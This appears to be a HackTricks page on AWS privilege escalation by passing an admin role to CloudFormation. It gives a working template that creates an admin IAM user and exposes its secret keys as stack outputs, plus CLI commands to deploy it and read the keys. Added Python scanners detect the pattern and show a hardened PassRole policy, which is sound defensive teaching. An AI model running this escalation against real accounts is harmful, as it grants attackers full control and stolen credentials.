iam:PassRole, cloudformation:CreateStack, and cloudformation:DescribeStacks


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

With this combination of permissions, an attacker can pass a privileged role to CloudFormation and deploy a template that creates an IAM user, attaches an allow-everything policy to it, and emits that user's access keys as stack outputs, for example:

```json
{
  "Resources": {
    "AdminUser": {
      "Type": "AWS::IAM::User"
    },
    "AdminPolicy": {
      "Type": "AWS::IAM::ManagedPolicy",
      "Properties": {
        "Description": "This policy allows all actions on all resources.",
        "PolicyDocument": {
          "Version": "2012-10-17",
          "Statement": [
            {
              "Effect": "Allow",
              "Action": ["*"],
              "Resource": "*"
            }
          ]
        },
        "Users": [
          {
            "Ref": "AdminUser"
          }
        ]
      }
    },
    "MyUserKeys": {
      "Type": "AWS::IAM::AccessKey",
      "Properties": {
        "UserName": {
          "Ref": "AdminUser"
        }
      }
    }
  },
  "Outputs": {
    "AccessKey": {
      "Value": {
        "Ref": "MyUserKeys"
      },
      "Description": "Access Key ID of Admin User"
    },
    "SecretKey": {
      "Value": {
        "Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"]
      },
      "Description": "Secret Key of Admin User"
    }
  }
}
```
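From the defender's side, the template above has a recognisable shape: it creates an IAM principal, attaches a policy allowing `*` on `*`, mints a long-lived access key and leaks its `SecretAccessKey` through a stack output. The following scanner is an added example (not HackTricks code or any AWS tooling) that flags each of those traits in a CloudFormation template before it is deployed, for instance as a CI gate or in a review of `CreateStack` template bodies. The template is embedded inline as constructed sample input; the resource names mirror the page's template.

```python
import fnmatch
import json

# Constructed sample input: a compact copy of the template shown on the page.
SAMPLE_TEMPLATE = {
    "Resources": {
        "AdminUser": {"Type": "AWS::IAM::User"},
        "AdminPolicy": {
            "Type": "AWS::IAM::ManagedPolicy",
            "Properties": {
                "PolicyDocument": {
                    "Version": "2012-10-17",
                    "Statement": [{"Effect": "Allow", "Action": ["*"], "Resource": "*"}],
                },
                "Users": [{"Ref": "AdminUser"}],
            },
        },
        "MyUserKeys": {
            "Type": "AWS::IAM::AccessKey",
            "Properties": {"UserName": {"Ref": "AdminUser"}},
        },
    },
    "Outputs": {
        "AccessKey": {"Value": {"Ref": "MyUserKeys"}},
        "SecretKey": {"Value": {"Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"]}},
    },
}

IAM_PRINCIPAL_TYPES = {"AWS::IAM::User", "AWS::IAM::Role", "AWS::IAM::Group"}
IAM_POLICY_TYPES = {"AWS::IAM::ManagedPolicy", "AWS::IAM::Policy"}


def _as_list(value):
    """IAM/CloudFormation fields may be a scalar or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _wildcard_statements(policy_doc):
    """Yield Allow statements whose Action and Resource both contain a bare '*'."""
    for stmt in _as_list(policy_doc.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action", []))
        resources = _as_list(stmt.get("Resource", []))
        if "*" in actions and "*" in resources:
            yield stmt


def _secret_key_refs(value):
    """Recursively collect resource names whose SecretAccessKey is read via Fn::GetAtt."""
    if isinstance(value, dict):
        att = value.get("Fn::GetAtt")
        if isinstance(att, list) and len(att) == 2 and att[1] == "SecretAccessKey":
            return [att[0]]
        if isinstance(att, str) and att.endswith(".SecretAccessKey"):  # short form
            return [att.split(".", 1)[0]]
        return [r for v in value.values() for r in _secret_key_refs(v)]
    if isinstance(value, list):
        return [r for v in value for r in _secret_key_refs(v)]
    return []


def scan_template(template):
    """Return a list of human-readable findings for a parsed CloudFormation template."""
    findings = []
    for name, res in template.get("Resources", {}).items():
        rtype = res.get("Type", "")
        props = res.get("Properties") or {}
        if rtype in IAM_PRINCIPAL_TYPES:
            findings.append(f"{name}: creates IAM principal ({rtype})")
        if rtype == "AWS::IAM::AccessKey":
            findings.append(f"{name}: creates long-lived access key")
        if rtype in IAM_POLICY_TYPES and any(
            True for _ in _wildcard_statements(props.get("PolicyDocument", {}))
        ):
            findings.append(f"{name}: policy allows Action '*' on Resource '*'")
    for out_name, out in template.get("Outputs", {}).items():
        for res_name in _secret_key_refs(out.get("Value")):
            findings.append(f"Outputs.{out_name}: exposes SecretAccessKey of {res_name}")
    return findings


def scan_template_text(text):
    """Convenience wrapper for a JSON template body (e.g. read from a file)."""
    return scan_template(json.loads(text))


if __name__ == "__main__":
    for finding in scan_template(SAMPLE_TEMPLATE):
        print("FINDING:", finding)
```

Any one of these findings on its own is not necessarily wrong (a deployment template may legitimately create a role), but the combination of principal, wildcard policy, access key and secret output is exactly the pattern this privilege escalation relies on, so a pipeline can refuse stacks that trip the access-key or secret-output checks unless explicitly approved. Wildcards nested in patterns such as `iam:*` are not expanded here; only the bare `*` case from the page is matched.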

Then create the CloudFormation stack, passing the privileged role:

```bash
aws cloudformation create-stack --stack-name privesc \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role arn:aws:iam::[REDACTED]:role/adminaccess \
    --capabilities CAPABILITY_IAM --region us-west-2
```

Wait a couple of minutes for the stack to be created, then read the stack outputs, where the credentials are stored:

```bash
aws cloudformation describe-stacks \
    --stack-name arn:aws:cloudformation:us-west-2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
    --region us-west-2
```
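The escalation works because `iam:PassRole` is granted broadly enough to hand an admin role to CloudFormation. The following added example (not HackTricks code or an AWS-provided tool) checks an IAM identity policy offline for the combination this page describes, `cloudformation:CreateStack` plus an `iam:PassRole` statement whose `Resource` covers every role, and shows a hardened policy beside the weak one. The hardened policy scopes PassRole to a single, deliberately limited deployment role and adds an `iam:PassedToService` condition; the account id `123456789012` and role name `cfn-deploy-limited` are constructed placeholders.

```python
import fnmatch

# Constructed sample: the over-broad grant that opens the CreateStack + PassRole path.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["cloudformation:CreateStack", "cloudformation:DescribeStacks"],
         "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},
    ],
}

# Constructed sample: same CloudFormation rights, but PassRole limited to one
# low-privilege deployment role and only when passed to CloudFormation itself.
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["cloudformation:CreateStack", "cloudformation:DescribeStacks"],
         "Resource": "*"},
        {"Effect": "Allow",
         "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/cfn-deploy-limited",  # placeholder
         "Condition": {"StringEquals": {"iam:PassedToService": "cloudformation.amazonaws.com"}}},
    ],
}


def _as_list(value):
    """IAM fields may be a scalar or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _action_matches(pattern, action):
    """IAM action matching is case-insensitive and supports '*' and '?' wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def allowed_statements(policy, action):
    """Allow statements granting `action`; an explicit Deny on Resource '*' wins."""
    allows, denied = [], False
    for stmt in _as_list(policy.get("Statement", [])):
        if not any(_action_matches(p, action) for p in _as_list(stmt.get("Action", []))):
            continue
        if stmt.get("Effect") == "Deny" and "*" in _as_list(stmt.get("Resource", [])):
            denied = True
        elif stmt.get("Effect") == "Allow":
            allows.append(stmt)
    return [] if denied else allows


def _passrole_is_broad(stmt):
    """PassRole is over-broad when the Resource covers every role (e.g. '*' or '.../role/*')."""
    return any(res == "*" or res.endswith("/*") for res in _as_list(stmt.get("Resource", [])))


def cloudformation_passrole_path(policy):
    """Return a finding if CreateStack is combined with broad PassRole, else None."""
    if not allowed_statements(policy, "cloudformation:CreateStack"):
        return None
    broad = [s for s in allowed_statements(policy, "iam:PassRole") if _passrole_is_broad(s)]
    if not broad:
        return None
    return ("cloudformation:CreateStack + unrestricted iam:PassRole: any role in the account, "
            "including admin roles, can be passed to a stack; scope PassRole's Resource to "
            "specific low-privilege deployment roles")


if __name__ == "__main__":
    for label, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(label, "->", cloudformation_passrole_path(policy) or "no finding")
```

The `iam:PassedToService` condition by itself does not close the hole (passing an admin role to CloudFormation is precisely the attack), so the check keys on the `Resource` scope, which is what actually limits which roles can be passed. The checker deliberately ignores `NotAction`, `NotResource` and resource-level conditions; treat a `None` result as "this simple pattern was not found", not as proof that no escalation path exists.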
